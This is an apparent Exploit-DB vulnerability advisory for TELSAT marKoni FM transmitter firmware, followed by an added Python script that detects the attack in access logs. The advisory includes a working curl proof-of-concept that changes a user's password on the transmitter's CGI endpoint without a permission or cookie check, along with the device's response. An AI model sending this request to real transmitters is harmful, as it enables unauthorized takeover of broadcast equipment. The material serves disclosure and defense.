TELSAT marKoni FM Transmitter 1.9.5 – Insecure Access Control Change Password

  • Author: LiquidWorm
    Date: 2024-03-18
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51908/
  • TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password
    
    
    Vendor: TELSAT Srl
    Product web page: https://www.markoni.it
    Affected version: Markoni-D (Compact) FM Transmitters
                      Markoni-DH (Exciter+Amplifiers) FM Transmitters
                      Markoni-A (Analogue Modulator) FM Transmitters
                      Firmware: 1.9.5
                                1.9.3
                                1.5.9
                                1.4.6
                                1.3.9
    
    Summary: Professional FM transmitters.
    
    Desc: An unauthorized user could exploit this vulnerability to change
    his/her password, potentially gaining unauthorized access to sensitive
    information or performing actions beyond his/her designated permissions.
    
    Tested on: GNU/Linux 3.10.53 (armv7l)
               icorem6solox
               lighttpd/1.4.33
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    Macedonian Information Security Research and Development Laboratory
    Zero Science Lab - https://www.zeroscience.mk - @zeroscience
    
    
    Advisory ID: ZSL-2024-5811
    Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5811.php
    
    
    10.11.2023
    
    --
    
    
    PoC request of a user changing his own password.
    Only admin can edit users. No permissions or Cookie check.
    
    $ curl -s -H "Cookie: name=user-1702119917" \
    "http://10.0.8.3:88/cgi-bin/ekafcgi.fcgi?OpCode=4&username=user&password=user&newpassword=t00tw00t"
    
    HTTP/1.1 200 OK
    Content-type: text/html
    Cache-control: no-cache
    Set-Cookie: name=user-1702119917; max-age=315360000
    Transfer-Encoding: chunked
    Date: Sat, 9 Dec 2023 11:05:17 GMT
    Server: lighttpd/1.4.33
    
    oc=4&resp=0
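
A defender-side check, added here as an example and not part of the original advisory: it scans web server access logs for the password-change request shown in the PoC (OpCode=4 on ekafcgi.fcgi) and reports the client, the targeted username and whether credentials were written to the log through the query string. The log layout (client address first, request line in double quotes), the ADMIN_HOSTS allow-list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

ENDPOINT = "/cgi-bin/ekafcgi.fcgi"   # path taken from the PoC request
PASSWORD_OPCODE = "4"                # OpCode value used in the PoC
SECRET_KEYS = {"password", "newpassword"}
ADMIN_HOSTS = {"10.0.8.10"}          # assumption: management workstation(s)

# Assumed log layout: client address first, request line in double quotes.
LINE_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) ')

# Constructed sample log lines (not captured from a real device).
SAMPLE_LOG = '''\
10.0.8.20 10.0.8.3:88 - [09/Dec/2023:11:05:17 +0000] "GET /cgi-bin/ekafcgi.fcgi?OpCode=4&username=user&password=user&newpassword=t00tw00t HTTP/1.1" 200 11 "-" "curl/8.4.0"
10.0.8.10 10.0.8.3:88 - [09/Dec/2023:12:00:00 +0000] "GET /cgi-bin/ekafcgi.fcgi?OpCode=4&username=admin&password=old&newpassword=new HTTP/1.1" 200 11 "-" "Mozilla/5.0"
10.0.8.20 10.0.8.3:88 - [09/Dec/2023:12:01:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
'''

def find_password_changes(log_text, admin_hosts=ADMIN_HOSTS):
    """Return one finding per password-change request; secret values are never copied."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        params = dict(parse_qsl(url.query, keep_blank_values=True))
        if url.path != ENDPOINT or params.get("OpCode") != PASSWORD_OPCODE:
            continue
        findings.append({
            "client": m["client"],
            "username": params.get("username", ""),
            "status": int(m["status"]),
            "from_admin_host": m["client"] in admin_hosts,
            # GET parameters are logged, so credentials may sit in the log itself.
            "secrets_in_log": sorted(SECRET_KEYS & params.keys()),
        })
    return findings

if __name__ == "__main__":
    for f in find_password_changes(SAMPLE_LOG):
        flag = "expected" if f["from_admin_host"] else "REVIEW"
        print(flag, f)
```

Because the request carries `password` and `newpassword` as GET parameters, any access log that records the request line also stores those values, so logs covering such requests should be handled as credential material.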